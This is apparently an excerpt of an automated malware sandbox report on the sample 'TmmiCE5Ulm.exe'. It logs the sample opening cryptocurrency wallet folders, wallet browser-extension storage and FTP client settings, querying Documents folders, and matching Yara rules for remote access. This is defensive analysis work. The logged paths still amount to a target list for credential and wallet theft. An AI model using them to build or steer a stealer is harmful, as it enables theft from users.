Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: number of queries: 1001
Source: Yara match File source: 00000000.00000003.2228599565.000000000118B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2231964807.0000000001154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2232123533.0000000001154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2231739674.0000000001154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: TmmiCE5Ulm.exe PID: 5600, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: Process Memory Space: TmmiCE5Ulm.exe PID: 5600, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs